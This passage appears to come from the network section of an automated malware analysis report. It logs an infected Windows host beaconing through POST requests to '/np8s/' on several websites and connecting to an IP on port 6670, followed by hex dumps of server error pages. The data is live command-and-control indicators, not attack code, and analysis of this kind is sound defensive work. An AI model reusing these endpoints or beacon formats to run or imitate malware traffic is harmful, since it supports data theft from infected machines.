53 56 35 35 51 34 4c 72 32 63 73 36 35 70 7e 45 4d 51 44 4e 73 57 51 4e 32 4d
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 47 62 6c 68 68 35 74 66 6c 78 4d 32 61 6a 63 4c 58 77 50 6e 6d 7e 53 68 5a 4c 48 61 4c 4e 48 63 72 64 51 36 30 59 2d 6a 32 61 76 6a 32 65 4e 6c 33 43 39 56 54 6a 65 65 58 61 4b 32 4f 78 6b 28 5a 7e 32 6d 68 36 6d 55 6d 52 70 43 79 76 78 71 36 69 72 56 69 4e 57 4b 69 36 38 4f 4a 44 45 6c 53 71 67 28 58 37 50 71 54 35 5f 62 64 44 4c 6a 61 46 6b 50 49 35 33 37 4f 52 54 57 4b 53 6a 72 4f 4a 37 71 70 56 43 61 6d 52 39 77 66 62 58 6c 43 69 65 54 2d 50 6f 65 43 71 66 7a 57 35 4c 39 30 69 76 65 73 7a 44 43 78 64 47 59 64 4a 32 50 57 42 47 70 5a 4e 66 6e 55 32 33 61 76 65 46 6a 7a 42 50 48 30 78 66 47 34 53 7a 56 32 52 79 72 66 6d 43 31 37 68 6f 6d 36 4a 49 59 64 31 33 42 4d 33 49 78 77 45 41 58 70 48 57 67 50 74 6c 77 65 75 42 70 4f 4e 6d 38 62 5a 6c 58 52 79 45 71 64 54 46 49 52 65 35 67 4c 58 73 50 33 39 52 73 49 6a 44 74 4a 68 48 4c 50 48 55 28 52 68 4d 55 75 59 72 35 67 6d 74 6f 44 48 7a 51 43 50 52 4b 55 36 35 4d 56 67 4a 75 63 6b 6c 4d 6c 54 6b 64 66 37 4a 6c 45 62 52 6a 78 44 6f 7e 56 35 70 77 43 45 34 64 38 32 4c 50 6d 37 63 72 34 4a 69 47 57 78 56 6b 46 37 46 41 5f 53 54 28 55 28 50 36 78 4d 54 73 35 43 4a 49 75 58 33 67 4d 73 71 70 56 41 4a 31 42 72 76 30 34 7e 4d 41 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=zJcaCGblhh5tflxM2ajcLXwPnm~ShZLHaLNHcrdQ60Y-j2avj2eNl3C9VTjeeXaK2Oxk(Z~2mh6mUmRpCyvxq6irViNWKi68OJDElSqg(X7PqT5_bdDLjaFkPI537ORTWKSjrOJ7qpVCamR9wfbXlCieT-PoeCqfzW5L90iveszDCxdGYdJ2PWBGpZNfnU23aveFjzBPH0xfG4SzV2RyrfmC17hom6JIYd13BM3IxwEAXpHWgPtlweuBpONm8bZlXRyEqdTFIRe5gLXsP39RsIjDtJhHLPHU(RhMUuYr5gmtoDHzQCPRKU65MVgJucklMlTkdf7JlEbRjxDo~V5pwCE4d82LPm7cr4JiGWxVkF7FA_ST(U(P6xMTs5CJIuX3gMsqpVAJ1Brv04~MAw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 43 62 4a 73 77 46 30 52 56 39 6e 79 73 6e 49 54 58 41 4e 6c 57 72 44 28 74 61 64 64 36 63 2d 45 50 56 68 37 78 31 5f 6e 47 57 4f 6e 33 4b 56 6c 32 54 32 64 41 48 42 4a 6e 58 34 32 4f 70 47 28 5a 79 32 6e 69 4b 74 58 46 70 50 46 51 58 79 74 61 69 54 55 69 4e 44 4f 6a 6d 42 4f 4a 47 30 6c 57 79 77 28 6e 48 50 34 68 78 5f 64 65 71 46 70 61 46 59 48 6f 4a 72 6c 2d 64 6b 57 4f 47 72 72 50 31 37 71 5a 4a 43 61 46 5a 38 6e 4d 7a 55 6f 79 69 62 57 2d 50 78 4c 53 76 75 7a 57 39 74 39 32 47 76 65 65 58 44 42 42 39 47 64 71 56 70 58 32 42 4a 37 70 4e 59 71 30 36 71 61 76 79 4a 6a 33 78 35 53 52 78 66 47 49 53 79 53 6b 77 53 36 34 79 52 36 62 56 50 6d 36 46 68 59 73 70 52 42 4e 4b 38 68 77 70 6c 59 71 7e 65 67 4d 42 44 6a 75 75 46 78 2d 4e 32 38 62 5a 46 58 52 79 6d 71 64 6a 46 49 53 75 35 68 70 66 73 4a 57 39 53 6f 6f 6a 4d 6d 70 68 66 46 76 4c 47 28 52 59 4a 55 75 78 6a 35 33 47 74 70 69 33 7a 58 32 62 53 52 6b 36 46 54 46 68 64 33 73 6b 71 4d 6c 54 38 64 65 36 4d 6c 33 76 52 67 45 37 6f 35 77 74 70 79 79 45 34 42 73 32 4a 57 32 33 79 72 37 35 6d 47 58 41 67 78 6d 58 46 5a 4e 61 54 78 56 28 50 35 42 4d 54 6a 5a 43 62 47 73 71 76 68 5f 30 5f 73 6e 41 6f 28 67 71 41 77 63 58 32 43 5a 78 63 43 2d 46 66 49 47 32 72 46 34 64 64 32 6a 76 46 4c 73 41 65 47 35 65 5f 59 71 49 5f 72 42 72 32 66 66 6b 6f 58 50 78 55 4d 63 46 55 6a 62 37 2d 55 76 5a 75 4e 47 55 62 4a 58 28 52 55 65 6b 72 6b 4a 68 65 50 66 61 78 7a 65 38 6c 7a 32 4a 46 62 4e 31 45 62 6c 77 68 49 74 66 4b 38 70 73 56 38 73 69 64 79 51 4b 58 6f 69 6c 4d 39 4d 69 50 70 4a 47 57 69 52 39 38 67 6a 73 64 56 35 28 65 62 62 58 75 44 51 30 2d 63 42 43 2d 71 52 55 57 62 4e 67 32 51 63 51 44 68 46 64 6e 49 72 6d 58 6e 4e 73 38 35 49 48 44 74 46 4c 31 56 6e 4b 32 49 62 6a 47 77 64 6a 50 4a 2d 31 2d 31 6a 72 77 63 47 7e 45 49 59 28 74 30 33 46 4b 68 32 45 39 42 2d 6f 77 72 57 35 52 65 74 69 76 59 4a 76 6e 58 77 72 4a 64 35 72 48 46 64 75 46 48 50 66 49 6f 33 48 48 4d 64 7a 30 78 67 79 49 67 34 32 33 55 49 66 33 48 2d 72 41 68 62 6f 59 78 30 71 65 53 58 36 5f 41 33 49 2d 77 73 70 74 4c 42 41 63 4a 64 33 38 56 77 63 70 50 47 55 6c 6b 58 51 6f 43 46 4c 33 39 54 6a 66 70 45 6e 53 45 4b 73 5f 48 49 47 61 44 5a 4d 39 78 37 66 4c 58 5f 43 4f 69 6a 56 6b 78 65 7e 4b 4a 6c 35 52 6e 36 63 4e 4b 4e 62 41 61 38 66 63 47 74 39 56 42 75 68 50 6b 4c 30 64 72 6d 4b 4f 7a 67 69 58 56 42 56 50 41 34 72 42 39 42 30 33 73 47 47 5a 36 52 6e 74 47 52 6a 53 51 6d 39 74 4b 71 65 6f 38 63 37 41 64 34 4f 7a 5a 4d 58 50 59 36 7a 77 6f 2d 57 78 69 6e 56 55 37 69 6d 53 32 49 47 4c 35 47 62 55
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 35 37 38 43 41 37 64 6f 71 73 77 42 30 65 58 78 49 41 71 33 6c 4d 56 78 56 71 76 4e 30 54 4c 59 33 6d 65 37 7a 36 42 34 6d 46 4a 4c 68 34 50 2d 4a 68 45 6e 37 35 7e 32 5a 75 6a 48 67 38 61 4b 63 59 67 32 44 37 55 41 57 5a 74 70 31 79 56 53 65 68 62 54 47 71 46 36 6a 63 6c 79 37 72 66 33 78 6a 45 59 33 51 71 30 65 61 49 59 31 68 43 71 64 4f 67 5f 62 52 71 32 63 54 41 4f 4c 63 58 66 6a 79 70 56 68 45 33 6b 6a 71 75 51 42 72 36 39 69 56 4f 4e 66 49 69 35 46 70 69 33 50 65 37 7a 48 34 53 32 33 33 77 48 4d 2d 78 55 72 47 4c 2d 72 48 45 74 77 43 53 4a 56 67 62 56 62 5f 59 42 74 65 57 50 44 37 6d 46 4f 4a 73 6f 4f 64 6c 76 58 68 31 6e 6c 4d 4b 62 39 6d 58 61 66 72 52 68 50 69 50 46 6a 4b 36 61 6e 5a 37 6a 66 33 65 66 62 56 57 76 50 75 32 6d 31 38 34 6f 67 42 45 42 72 4c 36 30 70 62 51 69 6a 58 66 73 44 70 47 51 52 33 67 77 41 6f 51 4c 28 42 61 59 42 53 65 41 63 67 41 6f 33 75 36 6e 46 52 7e 6e 6b 4c 56 54 31 37 76 38 6b 4b 45 4d 34 77 39 54 35 4c 68 42 67 79 44 58 43 6d 36 66 49 72 44 64 31 7a 71 7a 68 61 41 31 39 52 78 54 62 41 54 5f 52 62 4d 53 51 5f 49 36 6a 77 70 6c 56 57 39 76 70 75 49 69 72 36 74 37 56 4a 59 74 72 2d 37 56 50 68 4c 35 31 52 5a 71 38 62 28 4e 5a 44 68 52 71 6e 54 52 4e 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=578CA7doqswB0eXxIAq3lMVxVqvN0TLY3me7z6B4mFJLh4P-JhEn75~2ZujHg8aKcYg2D7UAWZtp1yVSehbTGqF6jcly7rf3xjEY3Qq0eaIY1hCqdOg_bRq2cTAOLcXfjypVhE3kjquQBr69iVONfIi5Fpi3Pe7zH4S233wHM-xUrGL-rHEtwCSJVgbVb_YBteWPD7mFOJsoOdlvXh1nlMKb9mXafrRhPiPFjK6anZ7jf3efbVWvPu2m184ogBEBrL60pbQijXfsDpGQR3gwAoQL(BaYBSeAcgAo3u6nFR~nkLVT17v8kKEM4w9T5LhBgyDXCm6fIrDd1zqzhaA19RxTbAT_RbMSQ_I6jwplVW9vpuIir6t7VJYtr-7VPhL51RZq8b(NZDhRqnTRNQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 35 37 38 43 41 36 4d 72 31 73 55 45 33 4f 61 68 62 69 71 6a 74 64 6c 33 54 4b 72 43 37 7a 6e 4c 67 48 4f 33 39 62 77 65 6e 45 77 4d 6b 49 53 59 4e 69 30 76 37 39 32 50 44 73 33 44 6e 63 57 56 63 5a 49 49 44 37 41 41 58 61 38 30 79 52 64 72 5a 48 76 51 42 4b 45 66 67 63 6c 76 77 4a 72 65 78 6a 42 5f 33 51 69 43 64 70 73 59 6e 33 47 71 62 4e 59 6c 46 42 71 77 64 54 51 43 50 63 71 67 6a 78 59 4b 68 42 50 6b 6a 61 79 51 41 49 53 36 70 30 4f 53 62 59 6a 7a 41 70 69 75 61 4f 28 42 48 34 6e 56 33 32 4d 48 4d 4c 68 55 71 53 37 2d 28 6b 63 75 6f 69 53 41 52 67 62 53 52 66 56 48 74 64 6a 64 44 2d 47 37 4e 38 73 6f 50 74 6c 71 64 51 77 61 79 76 54 62 28 6d 6a 74 66 72 74 45 4f 7a 6a 64 6a 49 50 4c 77 36 79 62 51 31 32 35 62 58 37 79 4a 4f 32 69 39 63 34 76 67 42 45 48 72 4c 37 58 70 62 41 69 6a 55 28 73 44 4e 75 51 59 7a 38 7a 4c 6f 51 4f 77 68 61 36 63 43 53 4b 63 68 70 76 33 75 43 4a 51 77 71 6e 6c 71 6c 54 79 4b 75 71 72 71 45 56 38 77 39 61 33 72 68 34 67 79 44 68 43 6e 36 50 49 34 33 64 7a 69 71 7a 6d 38 38 31 6d 42 78 54 51 67 54 39 4b 4c 42 4b 51 2d 73 2d 6a 31 74 66 57 68 46 76 75 39 77 69 72 62 74 37 55 5a 59 74 7e 75 36 41 48 43 6a 38 35 52 59 66 35 4b 54 70 53 6d 41 47 67 6c 4b 49 58 50 72 34 46 6b 42 48 4f 4c 44 6e 4e 73 49 66 51 55 35 52 44 4d 6a 61 28 50 72 47 51 33 6c 43 34 42 69 39 42 50 78 41 33 39 62 43 6b 51 49 4a 42 74 4f 52 55 41 31 75 68 74 6a 78 6d 35 52 65 46 55 7e 67 42 6f 4e 6f 44 65 6b 79 78 6f 7e 35 32 68 42 6f 70 33 62 6b 57 5a 63 34 4d 64 50 65 62 50 4f 6e 72 47 43 56 78 61 6b 47 6f 51 32 6e 79 5a 48 49 53 65 39 4e 53 4b 7e 6f 67 31 44 57 6b 33 34 76 58 43 74 6d 6b 5a 53 7a 33 6b 73 75 55 72 31 66 76 47 69 78 37 50 4f 43 65 34 70 63 52 72 6c 4d 75 32 4e 73 38 57 5a 44 4c 4a 5a 30 39 79 34 74 74 67 4a 5f 69 4e 54 6b 55 38 4e 34 6d 31 75 4e 54 48 59 68 66 30 36 4d 76 4d 48 33 49 36 44 36 72 48 42 39 6a 4d 76 48 78 7a 64 4d 74 35 6d 79 78 37 68 43 55 74 64 50 55 38 52 4e 47 78 73 44 75 45 41 70 51 50 77 72 75 48 41 31 70 76 58 66 4d 36 65 4d 42 79 45 49 64 42 42 64 73 47 4e 6d 76 63 4f 45 45 71 56 49 6e 57 68 6e 63 4c 31 53 67 72 70 68 69 6f 28 34 45 33 54 55 41 52 69 30 64 6d 75 4c 78 74 4b 55 70 61 4b 5f 38 4c 4f 6a 73 30 50 75 45 74 43 50 6d 4d 6a 66 49 31 34 33 33 73 39 52 33 50 58 33 63 30 78 59 43 36 78 68 63 44 45 6b 6d 41 6c 34 38 4e 7e 46 5a 2d 66 69 76 77 64 4c 62 73 50 2d 38 61 48 4a 65 6c 52 44 46 37 38 56 77 41 55 79 41 30 76 4f 51 74 39 56 34 4f 42 6e 75 71 28 42 75 4c 33 37 6f 65 33 64 72 34 39 61 70 67 4f 4c 6b 72 44 45 76 4d 46 4f 58 42 59 71 66 33 69 38 43 50 51 49 44 49 78 50 6a 42 54 62 6e 41 78 4c 36 4f
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49726 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 596date: Fri, 27 May 2022 16:47:16 GMTserver: LiteSpeedvary: User-Agent,User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 38 73 2f 3f 55 34 38 68 3d 64 2f 6e 73 74 45 66 4a 6a 36 45 71 48 49 61 6f 36 33 46 4a 30 73 39 47 75 71 41 39 35 4b 51 48 6f 71 74 61 6b 74 6a 72 39 2f 70 32 6a 48 77 6c 6b 43 51 33 79 68 43 45 6f 32 79 45 6b 7a 41 63 6e 43 77 69 26 61 6d 70 3b 6d 38 38 68 53 3d 36 6c 64 38 69 32 42 68 53 52 32 70 76 48 77 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6a 6c 62 77 61 74 65 72 64 61 6d 61 67 65 72 65 70 61 69 72 73 65 61 74 74 6c 65 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&amp;m88hS=6ld8i2BhSR2pvHw was not found on this server.<HR><I>www.jlbwaterdamagerepairseattle.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:47:32 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 May 2022 16:47:37 GMTContent-Type: text/htmlContent-Length: 291ETag: "628d16df-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:47:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:48:20 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Fri, 27 May 2022 16:48:37 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:49:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:49:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 